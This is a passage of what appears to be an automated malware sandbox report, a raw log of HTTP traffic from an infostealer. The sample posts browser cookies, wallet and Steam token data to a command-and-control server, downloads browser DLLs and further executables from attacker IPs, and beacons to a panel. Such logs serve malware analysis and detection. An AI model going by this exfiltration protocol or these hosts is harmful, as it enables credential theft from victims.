name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="message"plugins------GIIIECBGDHJJKFIDAKJD--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJKHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="message"fplugins------CGIEGHJEGHJKFIEBFHJK--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHCBAAEHCFIDGDHJEHCHost: 85.28.47.4Content-Length: 7139Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3L
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBFBAEBKJJJJKFCGCBHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 2d 2d 0d 0a Data Ascii: ------KECBFBAEBKJJJJKFCGCBContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------KECBFBAEBKJJJJKFCGCBContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KECBFBAEBKJJJJKFCGCBContent-Disposition: form-data; name="file"------KECBFBAEBKJJJJKFCGCB--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJEHJKJEBGHJJKEBGIHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 2d 2d 0d 0a Data Ascii: ------HJKJEHJKJEBGHJJKEBGIContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------HJKJEHJKJEBGHJJKEBGIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------HJKJEHJKJEBGHJJKEBGIContent-Disposition: form-data; name="file"------HJKJEHJKJEBGHJJKEBGI--
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBHost: 85.28.47.4Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGIEHIJKKFIDHDGIDHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 2d 2d 0d 0a Data Ascii: ------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="message"wallets------HJJEGIEHIJKKFIDHDGID--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="message"files------CAKFIJDHJEGIDHJKKKJJ--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file"------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIIDGCFHIEGDGCBFHDHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 2d 2d 0d 0a Data Ascii: ------JEHIIDGCFHIEGDGCBFHDContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------JEHIIDGCFHIEGDGCBFHDContent-Disposition: form-data; name="message"jbdtaijovg------JEHIIDGCFHIEGDGCBFHD--
Source: global traffic	HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 35 44 41 37 38 41 38 42 31 45 37 33 30 39 39 33 30 35 32 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"75DA78A8B1E73099305215------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"jony------KJKJJEGIDBGIDGCBAFHC--
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
